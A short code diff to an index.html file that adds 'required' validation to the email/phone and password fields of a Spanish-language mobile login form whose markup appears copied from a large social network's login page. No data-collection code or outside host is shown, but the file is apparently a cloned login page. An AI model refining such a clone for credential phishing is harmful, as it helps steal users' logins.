--- a/index.html
+++ b/index.html
@@ -539,6 +539,7 @@
                               name="email"
                               placeholder="N&#xfa;mero de m&#xf3;vil o correo electr&#xf3;nico"
                               type="text"
+                              required
                               data-sigil="m_login_email"
                             />
                           </div>
@@ -556,6 +557,7 @@
                                     autocapitalize="off"
                                     class="_56bg _4u9z _27z2 _8qtm"
                                     autocomplete="on"
+                                    required
                                     id="m_login_password"
                                     name="pass"
                                     placeholder="Contrase&#xf1;a"
